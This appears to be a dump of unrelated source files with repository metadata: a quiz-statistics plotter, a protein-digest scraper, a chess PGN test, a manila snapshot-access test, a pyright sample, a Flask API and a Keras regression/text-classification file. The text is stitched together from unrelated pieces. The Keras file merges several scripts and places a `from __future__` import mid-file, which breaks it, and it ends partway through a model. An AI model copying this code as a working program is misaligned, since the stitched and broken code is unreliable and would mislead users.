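# Proposal box in (x1, y1, x2, y2) order, as read from the .txt lines above.
x1, y1, x2, y2 = 40, 50, 120, 150
cropped = image[y1:y2, x1:x2]            # note rows are y, columns are x

# Binary mask the same size as the crop: 255 keeps a pixel, 0 removes it.
mask = np.zeros(cropped.shape[:2], dtype=np.uint8)
mask[10:60, 20:70] = 255

# Equivalent of cv2.bitwise_and(cropped, cropped, mask=mask):
masked = cropped * (mask[:, :, None] > 0)
assert masked.shape == cropped.shape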
fe39cd977754d7baa5900e133ad7f76b583b9786
3,509
py
Python
stats.py
shirshanka/fact-ory
9e6bae63ca7f8f534b811058efb8942004d6a37b
[ "Apache-2.0" ]
null
null
null
stats.py
shirshanka/fact-ory
9e6bae63ca7f8f534b811058efb8942004d6a37b
[ "Apache-2.0" ]
null
null
null
stats.py
shirshanka/fact-ory
9e6bae63ca7f8f534b811058efb8942004d6a37b
[ "Apache-2.0" ]
null
null
null
import numpy as np; import sys import matplotlib.pyplot as plt; from matplotlib import cm; from termcolor import colored; class Stats(): def __init__(self, param1_range, param2_range): self._total_times = 0; self._total_time = 0.0; self._wrong_answers = []; self._time_dict = {}; self._param1_range = param1_range self._param2_range = param2_range self._param1_length = param1_range[1] - param1_range[0] + 1 self._param2_length = param2_range[1] - param2_range[0] + 1 self._red_color = 1.0 self._green_color = 0.3 self._cream_color = 0.6 self._default_color = np.nan self._wrong_color = 1000.0 self._time_penalty = 2.0 # time penalty for wrong answer is 5 seconds self._result_matrix = np.full((self._param1_length, self._param2_length), self._default_color) def add_statistic(self, operator, param1,param2,ans,time_diff): self.add_time_statistic(param1, param2, time_diff) x_axis = param1 - self._param1_range[0] y_axis = param2 - self._param2_range[0] curr_value = self._result_matrix[x_axis][y_axis] incr_value = time_diff if (operator.evaluate(param1, param2) != ans): # wrong answer self.add_wrong_answer(param1,param2,ans) incr_value = incr_value + self._time_penalty else: # right answer: do nothing pass if np.isnan(curr_value): self._result_matrix[x_axis][y_axis] = incr_value else: self._result_matrix[x_axis][y_axis] = curr_value + incr_value def add_time_statistic(self, param1, param2, time_diff): self._total_times = self._total_times +1; self._total_time = self._total_time + time_diff; if not self._time_dict.has_key(param1): self._time_dict[param1] = [] if not self._time_dict.has_key(param2): self._time_dict[param2] = [] self._time_dict[param1].append(time_diff) self._time_dict[param2].append(time_diff) def add_wrong_answer(self, param1, param2, answer_given): self._wrong_answers.append((param1,param2, answer_given)) def get_avg_time(self): return (self._total_time / self._total_times); def print_stats(self, operator): sys.stdout.write("You took an average of %0.2f seconds to answer each question!\n" % self.get_avg_time()); if self._wrong_answers != []: print("Here were the answers you got wrong...") for (f1,f2,ans) in self._wrong_answers: print ("%d %s %d = " % (f1,operator.symbol,f2)), colored("%d" % ans, "red"), "Correct answer is ", colored("%d" % operator.evaluate(f1,f2), "green") row_labels = range(self._param1_range[0],self._param1_range[1]+1) col_labels = range(self._param2_range[0],self._param2_range[1]+1) #plt.matshow(self._result_matrix, cmap=cm.Spectral_r, vmin=0, vmax=1) fig = plt.figure() ax = fig.add_subplot(111) cax = ax.matshow(self._result_matrix, interpolation='nearest', vmin=0) fig.colorbar(cax) plt.gca().set_aspect('auto') row_ticks = range(len(row_labels)) col_ticks = range(len(col_labels)) if (len(row_labels) > 10): skip_every = int(len(row_labels) / 10); row_labels = row_labels[0::skip_every] row_ticks = row_ticks[0::skip_every] if (len(col_labels) > 10): skip_every = int(len(col_labels)/10) col_labels = col_labels[0::skip_every] col_ticks = col_ticks[0::skip_every] plt.xticks(col_ticks, col_labels) plt.yticks(row_ticks, row_labels) plt.show() if __name__=="__main__": print "hello world"
34.742574
154
0.68937
3,336
0.950698
0
0
0
0
0
0
349
0.099459
fe3be5e4c8643dd88fcaa6473267f6ae2cf76961
1,706
py
Python
examples/peptidecutter/advanced.py
zjuchenyuan/EasyLogin
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
[ "MIT" ]
33
2016-12-01T01:33:31.000Z
2021-05-12T03:32:27.000Z
examples/peptidecutter/advanced.py
zjuchenyuan/EasyLogin
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
[ "MIT" ]
2
2018-04-26T06:58:29.000Z
2020-01-11T15:18:14.000Z
examples/peptidecutter/advanced.py
zjuchenyuan/EasyLogin
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
[ "MIT" ]
4
2017-02-24T11:08:45.000Z
2021-01-13T16:00:33.000Z
from EasyLogin import EasyLogin from pprint import pprint def peptidecutter(oneprotein): a = EasyLogin(proxy="socks5://127.0.0.1:1080") #speed up by using proxy a.post("http://web.expasy.org/cgi-bin/peptide_cutter/peptidecutter.pl", "protein={}&enzyme_number=all_enzymes&special_enzyme=Chym&min_prob=&block_size=60&alphtable=alphtable&cleave_number=all&cleave_exactly=&cleave_range_min=&cleave_range_max=".format(oneprotein) ) table=a.b.find("table",{"class":"proteomics2"}) tds=table.find_all("td") result = [] oneline = [] i = 0 for td in tds: i+=1 if i==1: content = td.text elif i==2: content = int(td.text) else: content = [int(i) for i in td.text.split()] oneline.append(content) if i==3: result.append(oneline) oneline=[] i=0 return result def fasta_reader(filename): filecontents = open(filename).read().split("\n") name = "" thedata = "" result=[] for line in filecontents: if not len(line): continue if line[0]=='>': if len(thedata): result.append([name,thedata]) thedata = "" name = line else: thedata += line result.append([name,thedata])#don't forget the last one return result def peptidecutter_more(filename): return [ [name,peptidecutter(oneprotein)] for name,oneprotein in fasta_reader(filename) ] if __name__ == "__main__": #pprint(peptidecutter("SERVELAT")) import sys pprint(peptidecutter_more(sys.argv[1]))
30.464286
200
0.579132
0
0
0
0
0
0
0
0
401
0.235053
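A short standalone check of the FASTA-parsing convention used by fasta_reader above (header lines start with '>', sequence lines are concatenated until the next header); the records here are invented for illustration:

def parse_fasta_lines(lines):
    # Same logic as fasta_reader above, but over an in-memory list of lines.
    result, name, seq = [], "", ""
    for line in lines:
        if not line:
            continue
        if line[0] == ">":
            if seq:
                result.append([name, seq])
                seq = ""
            name = line
        else:
            seq += line
    result.append([name, seq])   # don't forget the last record
    return result

lines = [">sp|EXAMPLE1", "SERVELAT", "SERVELAT", ">sp|EXAMPLE2", "MKV"]
print(parse_fasta_lines(lines))
# [['>sp|EXAMPLE1', 'SERVELATSERVELAT'], ['>sp|EXAMPLE2', 'MKV']]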
fe3c13d3bb5c59b28cc1e5b5a35923b1537df9f4
1,333
py
Python
pgn2fixture/tests/test_utils.py
pointerish/pgn2fixture
02039680acc37cbca22fb332738e34cd113831a4
[ "MIT" ]
3
2021-03-18T19:08:59.000Z
2021-10-10T03:52:49.000Z
pgn2fixture/tests/test_utils.py
pointerish/pgn2fixture
02039680acc37cbca22fb332738e34cd113831a4
[ "MIT" ]
null
null
null
pgn2fixture/tests/test_utils.py
pointerish/pgn2fixture
02039680acc37cbca22fb332738e34cd113831a4
[ "MIT" ]
null
null
null
import unittest from .. import utils class TestUtils(unittest.TestCase): def setUp(self) -> None: self.pgn_string = ''' [Event "US Championship 1963/64"] [Site "New York, NY USA"] [Date "1964.01.01"] [EventDate "1963.??.??"] [Round "11"][Result "0-1"] [White "Anthony Saidy"] [Black "Robert James Fischer"] [ECO "A33"] [WhiteElo "?"] [BlackElo "?"][PlyCount "112"] 1. c4 0-1''' def test_clean(self): result = ['Event "US Championship 1963/64"', 'Site "New York, NY USA"', 'Date "1964.01.01"', 'EventDate "1963.??.??"', 'Round "11"', 'Result "0-1"', 'White "Anthony Saidy"', 'Black "Robert James Fischer"', 'ECO "A33"', 'WhiteElo "?"', 'BlackElo "?"', 'PlyCount "112"', '1. c4 0-1'] self.assertEqual(utils.clean(self.pgn_string), result) def test_extract_tag_roster(self): result = {'event': 'US Championship 1963/64', 'site': 'New York, NY USA', 'date': '1964.01.01', 'eventdate': '1963.??.??', 'round': '11', 'result': '0-1', 'white': 'Anthony Saidy', 'black': 'Robert James Fischer', 'eco': 'A33', 'whiteelo': '?', 'blackelo': '?', 'plycount': '112', 'moves': '1. c4 0-1'} self.assertEqual(utils.extract_tag_roster(self.pgn_string), result)
43
165
0.549887
1,293
0.969992
0
0
0
0
0
0
845
0.633908
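A rough sketch of the behaviour the tests above expect from utils.clean and utils.extract_tag_roster (split the PGN tag pairs, map lower-cased tag names to values, and keep the movetext under 'moves'); this is illustrative only and not the package's actual implementation:

import re

def sketch_extract_tag_roster(pgn_string):
    tags = dict(re.findall(r'\[(\w+)\s+"([^"]*)"\]', pgn_string))
    roster = {key.lower(): value for key, value in tags.items()}
    # Whatever remains outside the [Tag "value"] pairs is the movetext.
    roster["moves"] = re.sub(r'\[\w+\s+"[^"]*"\]', "", pgn_string).strip()
    return roster

sample = '[Event "US Championship 1963/64"]\n[Result "0-1"]\n1. c4 0-1'
print(sketch_extract_tag_roster(sample))
# {'event': 'US Championship 1963/64', 'result': '0-1', 'moves': '1. c4 0-1'}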
fe3c354a94b9bc97c332f504c7fb8dc959b31224
7,019
py
Python
manila/tests/share/test_snapshot_access.py
gouthampacha/manila
4b7ba9b99d272663f519b495668715fbf979ffbc
[ "Apache-2.0" ]
3
2016-06-06T13:05:00.000Z
2021-05-05T04:29:24.000Z
manila/tests/share/test_snapshot_access.py
gouthampacha/manila
4b7ba9b99d272663f519b495668715fbf979ffbc
[ "Apache-2.0" ]
5
2019-08-14T06:46:03.000Z
2021-12-13T20:01:25.000Z
manila/tests/share/test_snapshot_access.py
gouthampacha/manila
4b7ba9b99d272663f519b495668715fbf979ffbc
[ "Apache-2.0" ]
2
2020-03-15T01:24:15.000Z
2020-07-22T20:34:26.000Z
# Copyright (c) 2016 Hitachi Data Systems, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import ddt import mock from manila.common import constants from manila import context from manila import db from manila import exception from manila.share import snapshot_access from manila import test from manila.tests import db_utils from manila import utils @ddt.ddt class SnapshotAccessTestCase(test.TestCase): def setUp(self): super(SnapshotAccessTestCase, self).setUp() self.driver = self.mock_class("manila.share.driver.ShareDriver", mock.Mock()) self.snapshot_access = snapshot_access.ShareSnapshotInstanceAccess( db, self.driver) self.context = context.get_admin_context() share = db_utils.create_share() self.snapshot = db_utils.create_snapshot(share_id=share['id']) self.snapshot_instance = db_utils.create_snapshot_instance( snapshot_id=self.snapshot['id'], share_instance_id=self.snapshot['share']['instance']['id']) @ddt.data(constants.ACCESS_STATE_QUEUED_TO_APPLY, constants.ACCESS_STATE_QUEUED_TO_DENY) def test_update_access_rules(self, state): rules = [] for i in range(2): rules.append({ 'id': 'id-%s' % i, 'state': state, 'access_id': 'rule_id%s' % i }) all_rules = copy.deepcopy(rules) all_rules.append({ 'id': 'id-3', 'state': constants.ACCESS_STATE_ERROR, 'access_id': 'rule_id3' }) snapshot_instance_get = self.mock_object( db, 'share_snapshot_instance_get', mock.Mock(return_value=self.snapshot_instance)) snap_get_all_for_snap_instance = self.mock_object( db, 'share_snapshot_access_get_all_for_snapshot_instance', mock.Mock(return_value=all_rules)) self.mock_object(db, 'share_snapshot_instance_access_update') self.mock_object(self.driver, 'snapshot_update_access') self.mock_object(self.snapshot_access, '_check_needs_refresh', mock.Mock(return_value=False)) self.mock_object(db, 'share_snapshot_instance_access_delete') self.snapshot_access.update_access_rules(self.context, self.snapshot_instance['id']) snapshot_instance_get.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id'], with_share_data=True) snap_get_all_for_snap_instance.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id']) if state == constants.ACCESS_STATE_QUEUED_TO_APPLY: self.driver.snapshot_update_access.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance, rules, add_rules=rules, delete_rules=[], share_server=None) else: self.driver.snapshot_update_access.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance, [], add_rules=[], delete_rules=rules, share_server=None) def test_update_access_rules_delete_all_rules(self): rules = [] for i in range(2): rules.append({ 'id': 'id-%s' % i, 'state': constants.ACCESS_STATE_QUEUED_TO_DENY, 'access_id': 'rule_id%s' % i }) snapshot_instance_get = self.mock_object( db, 'share_snapshot_instance_get', mock.Mock(return_value=self.snapshot_instance)) snap_get_all_for_snap_instance = self.mock_object( db, 
'share_snapshot_access_get_all_for_snapshot_instance', mock.Mock(side_effect=[rules, []])) self.mock_object(db, 'share_snapshot_instance_access_update') self.mock_object(self.driver, 'snapshot_update_access') self.mock_object(db, 'share_snapshot_instance_access_delete') self.snapshot_access.update_access_rules(self.context, self.snapshot_instance['id'], delete_all_rules=True) snapshot_instance_get.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id'], with_share_data=True) snap_get_all_for_snap_instance.assert_called_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id']) self.driver.snapshot_update_access.assert_called_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance, [], add_rules=[], delete_rules=rules, share_server=None) def test_update_access_rules_exception(self): rules = [] for i in range(2): rules.append({ 'id': 'id-%s' % i, 'state': constants.ACCESS_STATE_APPLYING, 'access_id': 'rule_id%s' % i }) snapshot_instance_get = self.mock_object( db, 'share_snapshot_instance_get', mock.Mock(return_value=self.snapshot_instance)) snap_get_all_for_snap_instance = self.mock_object( db, 'share_snapshot_access_get_all_for_snapshot_instance', mock.Mock(return_value=rules)) self.mock_object(db, 'share_snapshot_instance_access_update') self.mock_object(self.driver, 'snapshot_update_access', mock.Mock(side_effect=exception.NotFound)) self.assertRaises(exception.NotFound, self.snapshot_access.update_access_rules, self.context, self.snapshot_instance['id']) snapshot_instance_get.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id'], with_share_data=True) snap_get_all_for_snap_instance.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id']) self.driver.snapshot_update_access.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance, rules, add_rules=rules, delete_rules=[], share_server=None)
41.532544
78
0.648383
6,087
0.867218
0
0
6,096
0.8685
0
0
1,422
0.202593
fe3d447e3c8eb707e5a1d8550493f94e70efafc2
269
py
Python
packages/pyright-internal/src/tests/samples/unnecessaryCast1.py
sasano8/pyright
e804f324ee5dbd25fd37a258791b3fd944addecd
[ "MIT" ]
4,391
2019-05-07T01:18:57.000Z
2022-03-31T20:45:44.000Z
packages/pyright-internal/src/tests/samples/unnecessaryCast1.py
sasano8/pyright
e804f324ee5dbd25fd37a258791b3fd944addecd
[ "MIT" ]
2,740
2019-05-07T03:29:30.000Z
2022-03-31T12:57:46.000Z
packages/pyright-internal/src/tests/samples/unnecessaryCast1.py
sasano8/pyright
e804f324ee5dbd25fd37a258791b3fd944addecd
[ "MIT" ]
455
2019-05-07T12:55:14.000Z
2022-03-31T17:09:15.000Z
# This sample tests the type checker's reportUnnecessaryCast feature. from typing import cast, Union def foo(a: int): # This should generate an error if # reportUnnecessaryCast is enabled. b = cast(int, a) c: Union[int, str] = "hello" d = cast(int, c)
19.214286
69
0.687732
0
0
0
0
0
0
0
0
145
0.539033
fe3dd2d72750bce0851326699b900d4e0689f605
690
py
Python
Python/1238.py
ArikBartzadok/beecrowd-challenges
ddb0453d1caa75c87c4b3ed6a40309ab99da77f2
[ "MIT" ]
null
null
null
Python/1238.py
ArikBartzadok/beecrowd-challenges
ddb0453d1caa75c87c4b3ed6a40309ab99da77f2
[ "MIT" ]
null
null
null
Python/1238.py
ArikBartzadok/beecrowd-challenges
ddb0453d1caa75c87c4b3ed6a40309ab99da77f2
[ "MIT" ]
null
null
null
def execucoes(): return int(input()) def entradas(): return input().split(' ') def imprimir(v): print(v) def tamanho_a(a): return len(a) def tamanho_b(b): return len(b) def diferenca_tamanhos(a, b): return (len(a) <= len(b)) def analisar(e, i, s): a, b = e if(diferenca_tamanhos(a, b)): for i in range(tamanho_a(a)): s += a[i] s += b[i] s += b[tamanho_a(a):] else: for i in range(tamanho_b(b)): s += a[i] s += b[i] s += a[tamanho_b(b):] return s def combinador(): n = execucoes() for i in range(n): imprimir(analisar(entradas(), i, '')) combinador()
18.157895
60
0.510145
0
0
0
0
0
0
0
0
5
0.007246
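The interleaving in analisar above alternates characters from the two strings and then appends the leftover tail of the longer one; the same result can be sketched more compactly with itertools.zip_longest:

from itertools import zip_longest

def combine(a, b):
    # Pair characters positionally, padding the shorter string with '',
    # then flatten: equivalent to the index loop plus tail-append above.
    return "".join(x + y for x, y in zip_longest(a, b, fillvalue=""))

assert combine("abc", "12345") == "a1b2c345"
assert combine("abcd", "xy") == "axby" + "cd"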
fe3e731bfc56815773233eb7a914918e37d052e2
974
py
Python
metadata_service/api/popular_tables.py
worldwise001/amundsenmetadatalibrary
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
[ "Apache-2.0" ]
null
null
null
metadata_service/api/popular_tables.py
worldwise001/amundsenmetadatalibrary
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
[ "Apache-2.0" ]
1
2019-09-21T23:59:46.000Z
2019-09-21T23:59:46.000Z
metadata_service/api/popular_tables.py
worldwise001/amundsenmetadatalibrary
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
[ "Apache-2.0" ]
1
2019-09-21T23:56:40.000Z
2019-09-21T23:56:40.000Z
from http import HTTPStatus

from typing import Iterable, Union, Mapping

from flask import request
from flask_restful import Resource, fields, marshal

from metadata_service.proxy import get_proxy_client


popular_table_fields = {
    'database': fields.String,
    'cluster': fields.String,
    'schema': fields.String,
    'table_name': fields.String(attribute='name'),
    'table_description': fields.String(attribute='description'),  # Optional
}

popular_tables_fields = {
    'popular_tables': fields.List(fields.Nested(popular_table_fields))
}


class PopularTablesAPI(Resource):
    """
    PopularTables API
    """
    def __init__(self) -> None:
        self.client = get_proxy_client()

    def get(self) -> Iterable[Union[Mapping, int, None]]:
        limit = request.args.get('limit', 10)
        popular_tables = self.client.get_popular_tables(num_entries=limit)
        return marshal({'popular_tables': popular_tables}, popular_tables_fields), HTTPStatus.OK
29.515152
96
0.722793
421
0.432238
0
0
0
0
0
0
159
0.163244
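Aside (illustration only, not part of the record above): a resource class like PopularTablesAPI is normally wired into an application through flask_restful's Api object. A minimal sketch, with the app and route chosen here purely for illustration (the actual amundsen application factory and URL are not shown in the record):

from flask import Flask
from flask_restful import Api

# hypothetical wiring for the PopularTablesAPI resource defined above
app = Flask(__name__)
api = Api(app)
api.add_resource(PopularTablesAPI, '/popular_tables/')
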
fe3e90a0352653677e5f89aa3d6275c22d3a1048
470
py
Python
tests/test1.py
SaijC/manhwaDownloader
f6e97cfe25355598e42633a3796d84b666d5302f
[ "MIT" ]
null
null
null
tests/test1.py
SaijC/manhwaDownloader
f6e97cfe25355598e42633a3796d84b666d5302f
[ "MIT" ]
null
null
null
tests/test1.py
SaijC/manhwaDownloader
f6e97cfe25355598e42633a3796d84b666d5302f
[ "MIT" ]
null
null
null
import requests
import logging
import cfscrape
import os

from manhwaDownloader.constants import CONSTANTS as CONST

logging.basicConfig(level=logging.DEBUG)

folderPath = os.path.join(CONST.OUTPUTPATH, 'serious-taste-of-forbbiden-fruit')

logging.info(len([file for file in os.walk(folderPath)]))
walkList = [file for file in os.walk(folderPath)]

chapterDicts = dict()

for folder, _, files in walkList[1:]:
    chapterDicts.update({folder: files})

print(chapterDicts)
24.736842
79
0.778723
0
0
0
0
0
0
0
0
34
0.07234
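Aside (illustration only, not part of the record above): os.walk yields (dirpath, dirnames, filenames) tuples with the root directory first, which is why the script slices walkList[1:] to keep only the per-chapter subfolders. A tiny sketch of the shape of that output, using the current directory as a stand-in path:

import os

for dirpath, dirnames, filenames in os.walk('.'):
    # the first tuple is the root itself; later tuples are its subdirectories
    print(dirpath, len(dirnames), len(filenames))
    break
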
fe3ee793457d0725edb13bd4a978ffe58340aff1
11,708
py
Python
others/Keras_custom_error.py
rahasayantan/Work-For-Reference
e052da538df84034ec5a0fe3b19c4287de307286
[ "MIT" ]
null
null
null
others/Keras_custom_error.py
rahasayantan/Work-For-Reference
e052da538df84034ec5a0fe3b19c4287de307286
[ "MIT" ]
null
null
null
others/Keras_custom_error.py
rahasayantan/Work-For-Reference
e052da538df84034ec5a0fe3b19c4287de307286
[ "MIT" ]
null
null
null
# define custom R2 metrics for Keras backend
from keras import backend as K

def r2_keras(y_true, y_pred):
    SS_res = K.sum(K.square( y_true - y_pred ))
    SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) )
    return ( 1 - SS_res/(SS_tot + K.epsilon()) )

# base model architecture definition
def model():
    model = Sequential()
    #input layer
    model.add(Dense(input_dims, input_dim=input_dims))
    model.add(BatchNormalization())
    model.add(Activation('relu'))
    model.add(Dropout(0.3))
    # hidden layers
    model.add(Dense(input_dims))
    model.add(BatchNormalization())
    model.add(Activation(act_func))
    model.add(Dropout(0.3))

    model.add(Dense(input_dims//2))
    model.add(BatchNormalization())
    model.add(Activation(act_func))
    model.add(Dropout(0.3))

    model.add(Dense(input_dims//4, activation=act_func))

    # output layer (y_pred)
    model.add(Dense(1, activation='linear'))

    # compile this model
    model.compile(loss='mean_squared_error', # one may use 'mean_absolute_error' as alternative
                  optimizer='adam',
                  metrics=[r2_keras] # you can add several if needed
                 )

    # Visualize NN architecture
    print(model.summary())
    return model

################K2

import pandas as pd
import numpy as np

from sklearn.feature_selection import SelectFromModel
from sklearn.linear_model import LassoCV
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import RobustScaler

from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, InputLayer, GaussianNoise
from keras.wrappers.scikit_learn import KerasRegressor

train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')

#
# Data preparation
#
y_train = train['y'].values
id_test = test['ID']

num_train = len(train)
df_all = pd.concat([train, test])
df_all.drop(['ID', 'y'], axis=1, inplace=True)

# One-hot encoding of categorical/strings
df_all = pd.get_dummies(df_all, drop_first=True)

# Sscaling features
scaler = RobustScaler()
df_all = scaler.fit_transform(df_all)

train = df_all[:num_train]
test = df_all[num_train:]

# Keep only the most contributing features
sfm = SelectFromModel(LassoCV())
sfm.fit(train, y_train)
train = sfm.transform(train)
test = sfm.transform(test)

print ('Number of features : %d' % train.shape[1])

def r2_keras(y_true, y_pred):
    SS_res = K.sum(K.square( y_true - y_pred ))
    SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) )
    return ( 1 - SS_res/(SS_tot + K.epsilon()) )

def build_model_fn(neurons=20, noise=0.25):
    model = Sequential()
    model.add(InputLayer(input_shape=(train.shape[1],)))
    model.add(GaussianNoise(noise))
    model.add(Dense(neurons, activation='tanh'))
    model.add(Dense(1, activation='linear'))
    model.compile(loss='mean_squared_error', optimizer='nadam', metrics=[r2_keras])
    return model

#
# Tuning model parameters
#
model = KerasRegressor(build_fn=build_model_fn, epochs=75, verbose=0)

gsc = GridSearchCV(
    estimator=model,
    param_grid={
        #'neurons': range(18,31,4),
        'noise': [x/20.0 for x in range(3, 7)],
    },
    #scoring='r2',
    scoring='neg_mean_squared_error',
    cv=5
)

grid_result = gsc.fit(train, y_train)

print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))

for test_mean, test_stdev, train_mean, train_stdev, param in zip(
        grid_result.cv_results_['mean_test_score'],
        grid_result.cv_results_['std_test_score'],
        grid_result.cv_results_['mean_train_score'],
        grid_result.cv_results_['std_train_score'],
        grid_result.cv_results_['params']):
    print("Train: %f (%f) // Test : %f (%f) with: %r" % (train_mean, train_stdev, test_mean, test_stdev, param))

#
# Train model with best params for submission
#
model = build_model_fn(**grid_result.best_params_)

model.fit(train, y_train, epochs=75, verbose=2)

y_test = model.predict(test).flatten()

df_sub = pd.DataFrame({'ID': id_test, 'y': y_test})
df_sub.to_csv('mercedes-submission.csv', index=False)

#########################

import pandas as pd
import numpy as np

from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor
from sklearn.decomposition import PCA, FastICA
from sklearn.preprocessing import RobustScaler
from sklearn.pipeline import make_pipeline, Pipeline, _name_estimators
from sklearn.linear_model import ElasticNet, ElasticNetCV
from sklearn.model_selection import cross_val_score, KFold
from sklearn.metrics import r2_score
from sklearn.base import BaseEstimator, TransformerMixin

import xgboost as xgb

train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')

y_train = train['y'].values
y_mean = np.mean(y_train)
id_test = test['ID']

num_train = len(train)
df_all = pd.concat([train, test])
df_all.drop(['ID', 'y'], axis=1, inplace=True)

# One-hot encoding of categorical/strings
df_all = pd.get_dummies(df_all, drop_first=True)

train = df_all[:num_train]
test = df_all[num_train:]

class AddColumns(BaseEstimator, TransformerMixin):
    def __init__(self, transform_=None):
        self.transform_ = transform_

    def fit(self, X, y=None):
        self.transform_.fit(X, y)
        return self

    def transform(self, X, y=None):
        xform_data = self.transform_.transform(X, y)
        return np.append(X, xform_data, axis=1)

class LogExpPipeline(Pipeline):
    def fit(self, X, y):
        super(LogExpPipeline, self).fit(X, np.log1p(y))

    def predict(self, X):
        return np.expm1(super(LogExpPipeline, self).predict(X))

#
# Model/pipeline with scaling,pca,svm
#
svm_pipe = LogExpPipeline(_name_estimators([RobustScaler(),
                                            PCA(),
                                            SVR(kernel='rbf', C=1.0, epsilon=0.05)]))

# results = cross_val_score(svm_pipe, train, y_train, cv=5, scoring='r2')
# print("SVM score: %.4f (%.4f)" % (results.mean(), results.std()))
# exit()

#
# Model/pipeline with scaling,pca,ElasticNet
#
en_pipe = LogExpPipeline(_name_estimators([RobustScaler(),
                                           PCA(n_components=125),
                                           ElasticNet(alpha=0.001, l1_ratio=0.1)]))

#
# XGBoost model
#
xgb_model = xgb.sklearn.XGBRegressor(max_depth=4, learning_rate=0.005, subsample=0.921,
                                     objective='reg:linear', n_estimators=1300, base_score=y_mean)

xgb_pipe = Pipeline(_name_estimators([AddColumns(transform_=PCA(n_components=10)),
                                      AddColumns(transform_=FastICA(n_components=10, max_iter=500)),
                                      xgb_model]))

# results = cross_val_score(xgb_model, train, y_train, cv=5, scoring='r2')
# print("XGB score: %.4f (%.4f)" % (results.mean(), results.std()))

#
# Random Forest
#
rf_model = RandomForestRegressor(n_estimators=250, n_jobs=4, min_samples_split=25,
                                 min_samples_leaf=25, max_depth=3)

# results = cross_val_score(rf_model, train, y_train, cv=5, scoring='r2')
# print("RF score: %.4f (%.4f)" % (results.mean(), results.std()))

#
# Now the training and stacking part.  In previous version i just tried to train each model and
# find the best combination, that lead to a horrible score (Overfit?).  Code below does out-of-fold
# training/predictions and then we combine the final results.
#
# Read here for more explanation (This code was borrowed/adapted) :
#

class Ensemble(object):
    def __init__(self, n_splits, stacker, base_models):
        self.n_splits = n_splits
        self.stacker = stacker
        self.base_models = base_models

    def fit_predict(self, X, y, T):
        X = np.array(X)
        y = np.array(y)
        T = np.array(T)

        folds = list(KFold(n_splits=self.n_splits, shuffle=True, random_state=2016).split(X, y))

        S_train = np.zeros((X.shape[0], len(self.base_models)))
        S_test = np.zeros((T.shape[0], len(self.base_models)))
        for i, clf in enumerate(self.base_models):

            S_test_i = np.zeros((T.shape[0], self.n_splits))

            for j, (train_idx, test_idx) in enumerate(folds):
                X_train = X[train_idx]
                y_train = y[train_idx]
                X_holdout = X[test_idx]
                y_holdout = y[test_idx]

                clf.fit(X_train, y_train)
                y_pred = clf.predict(X_holdout)[:]
                print ("Model %d fold %d score %f" % (i, j, r2_score(y_holdout, y_pred)))
                S_train[test_idx, i] = y_pred
                S_test_i[:, j] = clf.predict(T)[:]
            S_test[:, i] = S_test_i.mean(axis=1)

        # results = cross_val_score(self.stacker, S_train, y, cv=5, scoring='r2')
        # print("Stacker score: %.4f (%.4f)" % (results.mean(), results.std()))
        # exit()

        self.stacker.fit(S_train, y)
        res = self.stacker.predict(S_test)[:]
        return res

stack = Ensemble(n_splits=5,
                 #stacker=ElasticNetCV(l1_ratio=[x/10.0 for x in range(1,10)]),
                 stacker=ElasticNet(l1_ratio=0.1, alpha=1.4),
                 base_models=(svm_pipe, en_pipe, xgb_pipe, rf_model))

y_test = stack.fit_predict(train, y_train, test)

df_sub = pd.DataFrame({'ID': id_test, 'y': y_test})
df_sub.to_csv('submission.csv', index=False)

#############################

'''This example demonstrates the use of Convolution1D for text classification.

Gets to 0.89 test accuracy after 2 epochs.
90s/epoch on Intel i5 2.4Ghz CPU.
10s/epoch on Tesla K40 GPU.
'''

from __future__ import print_function

from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.datasets import imdb

# set parameters:
max_features = 5000
maxlen = 400
batch_size = 32
embedding_dims = 50
filters = 250
kernel_size = 3
hidden_dims = 250
epochs = 2

print('Loading data...')
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)
print(len(x_train), 'train sequences')
print(len(x_test), 'test sequences')

print('Pad sequences (samples x time)')
x_train = sequence.pad_sequences(x_train, maxlen=maxlen)
x_test = sequence.pad_sequences(x_test, maxlen=maxlen)
print('x_train shape:', x_train.shape)
print('x_test shape:', x_test.shape)

print('Build model...')
model = Sequential()

# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
model.add(Embedding(max_features,
                    embedding_dims,
                    input_length=maxlen))
model.add(Dropout(0.2))

# we add a Convolution1D, which will learn filters
# word group filters of size filter_length:
model.add(Conv1D(filters,
                 kernel_size,
                 padding='valid',
                 activation='relu',
                 strides=1))
# we use max pooling:
model.add(GlobalMaxPooling1D())

